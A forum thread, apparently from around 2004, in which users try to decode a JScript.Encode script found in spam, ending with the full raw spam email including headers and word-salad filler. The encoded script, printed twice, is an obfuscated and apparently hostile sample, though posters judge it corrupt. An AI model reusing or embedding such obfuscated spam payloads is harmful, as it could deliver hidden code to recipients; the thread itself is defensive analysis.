Decoding Jscript.encode?

[SirDice]

I'm seeing alot of spam these days with an encoded jscript attached to it. I'd like to decode it to see what it does.

Expample:

Code:

<script language="JScript.Encode">#@~^hQAAAA==~@#@&[Km!:+        YcADbYn`E@!(o"bHA~?"Z'r4OYa)Jz+!+ O, FF+R8*f&^kxV 4YhVr~qq9:C{!P_2&!C:'TPwI)\AAr"92"'!,j/I}SdqHMxE        WE@*@!&qwI)\A@*BbI@#@&AyIAAA==^#~@</script>

I've tried Windows Script Decoder but it doesn't seem to work.

Anybody know of other tools that are able to decode it?

[EaseZE]

This may be of some help but ill be keeping an eye out for some type of decoder that may work.
http://asimov.fateback.com/library/script.html

[Tim_axe]

Checkout: http://www.virtualconspiracy.com/ind...e=scrdec/intro
Download: http://www.virtualconspiracy.com/ind...crdec/download

Personally, I've never run into JScript.Encode. I don't like the M$ version of JavaScript / VB. Good luck decoding it, and please post back here.

[SirDice]

Both your links point to the same Windows Script Decoder I've tried before. Thanx anyway

Two things:

a) the Jscript.encode piece of code may be corrupt.
b) the Windows Script Decoder may be faulty.

To eliminate one or the other I would like to use a different tool to see what happens.

[Maestr0]

Its Pascal, but hey.

http://lists.virus.org/full-disclosu.../msg00735.html


-Maestr0

[Tedob1]

i tried to compile this for everyone, it sound like a handy thing to have, but not being a programmer by trade i got

"Error VBS_DEC.PAS 1 7: Must be first token on a line"

tell me how to correct this and ill post the file

[Maestr0]

SirDice, the code in your example appears to be corrupt. I was unable to decrypt it properly with the pascal prog but was able to use it to decrypt other pieces of encoded JScript (I choose a random string from http://62.131.86.111/analysis.htm)
The attached file is the previous Pascal program compiled for linux(x86)


-Maestr0

[slarty]

Assuming that the code runs in the browser properly, without errors, can you simply use the script debugger to see it?

If not, perhaps it's possible to attach a debugger to the browser when the decoded code is in memory and read it out of ram?

Perhaps it's some sort of compiled format, in which case a decompiler would be in order. However in my experience these things are not usually very complex, would just be a simple code.

Slarty

[Tim_axe]

Well, I am pretty sure that we can't copy/paste the encoded stuff from the quote/code tags because they could be binary, and the board itself is text. Binary into text = corrupted binary data.

SirDice, could you save the message and post it here? You can't copy/paste it because that might corrupt it. We need the original message as an attachment. If you know how (it isn't possible via webmail I think). Otherwise PM me and I'll give you my e-mail so you can forward it to me, and I'll try to attach it here. Good luck, and I didn't realizse my linkage was stuff you tried already.


Edit:
Acturally, Windows Script Encoder *might* have included the rest of the document in making a checksum? I don't know. But attach the message here and we can look at it. Removing the e-mail headers shouldn't hurt.

[SirDice]

Tim: AFAIK the encoding function encodes to ASCII (minus some HTML specific characters) code. It should be regular ASCII as you can embed it in a regular HTML file, just like any other piece of Jscript/Javascript. There should be no problem in copy 'n pasting.

I will check I didn't skip any non-ascii, just to make sure

I was kind of expecting the encoded bit to be currupt. I've seen the exact same spam message with and without the embedded and encoded jscript.

Thanx for all the help guys

For those that just cannot get enough No need to trace it. I know how it works, the received: header with MAIL.OUR.DOMAIN is the only one I trust as it's created by our servers, all the others are fake.

Received: from x.x.x.x (unverified [202.133.196.38]) by MAIL.OUR.DOMAIN
(Content Technologies SMTPRS 4.3.12) with SMTP id <T6b735a0e270a64781971c@MAIL.OUR.DOMAIN>;
Mon, 16 Aug 2004 09:33:02 +0200
X-Message-Info: 828Q3gpJOcc3txqETANQ824Ogab7QWw835e887HhNIp40
Received: from dns17domain.com.tw ([233.40.144.231]) by kqq2-Y6.domain.com.tw with Microsoft SMTPSVC(5.0.2195.6824);
Mon, 16 Aug 2004 09:29:52 +0100
Received: from domain.com.tw [127.0.0.1] by dnsdomain.com.tw
(SMTPD32-7.12 ) id BL9VCN1; Mon, 16 Aug 2004 14:28:52 +0600
Subject: tentative meeting on the 11th
From: Colleen Villarreal
To: some.guy@our.domain
Message-Id: <797997004233.u904474@domain.com.tw>
Content-Type: multipart/alternative;
boundary="--53139806245108445480"

----53139806245108445480
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Hi
diana told me that marry gets married. isn't that lovely?
when are you bringing mike home to show?
love , mom


blaspheme blusterybombast paleolithic goldsteinniobe
validate illsec disciplinary sandgilligan
foreign monocularmountainous alterman cowmengrid
abelson convivialhideout splurge bizetabduct
dichloride thunderflowerequipping longish permalloyhydroelectric
afferent trashmessage well californiumcurious
matrimony schuylerpaz straddle inexcusableguile
raj kowalskidispersible erie reameuphorbia
guy domainatop defrock contraceptivesprig
control drummondinattention molybdate clockwisedegumming
mart stepwisedustbin cranston wilmingtonhydrophobia
credulous cryptanalyticcorpse notoriety titillateconciliate
buxom ratasproul disparate kendallfibonacci
malady iketorrid feverish parkinsonilona
bless almagestlayton extempore levibureaucratic
delve seedbedmad firewall greenbriarminesweeper
illusive incorrectdelhi racetrack donnellywouldn't
westminster reconditedeputation twill wattswhimper
burgher belvederedeltoid beam bratwurstepstein




<script language=3D"JScript.Encode">#@~^hQAAAA=3D=3D~@#@&[Km!:+ YcADbYn`E@=
!(o"bHA~?"Z'r4OYa)Jz+!+ O, FF+R8*f&^kxV 4YhVr~qq9:C{!P_2&!C:'TPwI)\AAr"92"=
'!,j/I}SdqHMxE WE@*@!&qwI)\A@*BbI@#@&AyIAAA=3D=3D^#~@</script>



----53139806245108445480--